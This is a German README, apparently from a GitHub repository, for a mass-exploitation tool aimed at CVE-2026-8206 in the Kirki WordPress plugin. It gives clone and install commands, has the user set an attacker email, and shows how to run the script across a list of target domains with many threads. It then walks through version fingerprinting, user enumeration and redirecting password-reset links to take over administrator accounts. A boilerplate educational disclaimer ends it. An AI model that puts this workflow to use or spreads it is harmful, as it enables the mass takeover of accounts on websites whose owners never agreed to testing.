
Massenausnutzungstool für CVE-2026-8206 – Nicht authentifizierte Privilegienausweitung über 'handle_forgot_password' im Kirki WordPress-Plugin (≤6.0.6).
Massen-Exploit-Tool für CVE-2026-8206 – eine kritische Schwachstelle im Kirki WordPress-Plugin (Versionen ≤ 6.0.6), die es nicht authentifizierten Angreifern ermöglicht, Passwort-Reset-Links zu übernehmen und jedes Benutzerkonto, einschließlich Administratoren, zu übernehmen.
Das Kirki-Plugin stellt einen nicht authentifizierten REST-Endpunkt bereit (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password). Aufgrund fehlender Berechtigungsprüfungen und unzureichender E-Mail-Validierung kann ein Angreifer:
Betroffene Versionen: ≤ 6.0.6
Behobene Version: 6.0.7
readme.txt und kirki.min.css (unterstützt sowohl kirki- als auch kirki-test-Ordner)/wp-json/wp/v2/users ab (Fallback auf admin)requests-Bibliothekconcurrent.futures (Backport, normalerweise installiert)Installiere die Abhängigkeiten:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
Bearbeiten Sie das Skript, um Ihre Angreifer-E-Mail festzulegen:
ATTACKER_EMAIL = "[email protected]" # line ~15
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – Textdatei mit einer Domäne pro Zeile (mit oder ohne http:///https://)[threads] – optional, Anzahl der gleichzeitigen Threads (Standard: 15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – enthält erfolgreich ausgenutzte Ziele im Format:
URL|username|attacker_email|reset_link_sent_to_attacker_email
Beispiel:
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
Die Konsolenausgabe zeigt den Fortschritt in Echtzeit:
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable-Tag) und /.../kirki.min.css (Parameter ver) ab. Wenn Version ≤ 6.0.6, fortfahren./wp-json/wp/v2/users, falls leer Fallback auf admin.username = Zielbenutzernameemail = E-Mail des AngreifersemailBody = JSON, das den reset_link-Chip enthält200 und "Email sent" antwortet, wird das Ziel in geschrieben.Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Weitere Haftungsausschlüsse finden Sie auf dem Cover von Jenderal92. Sie können es HIER !!! einsehen.
res.txt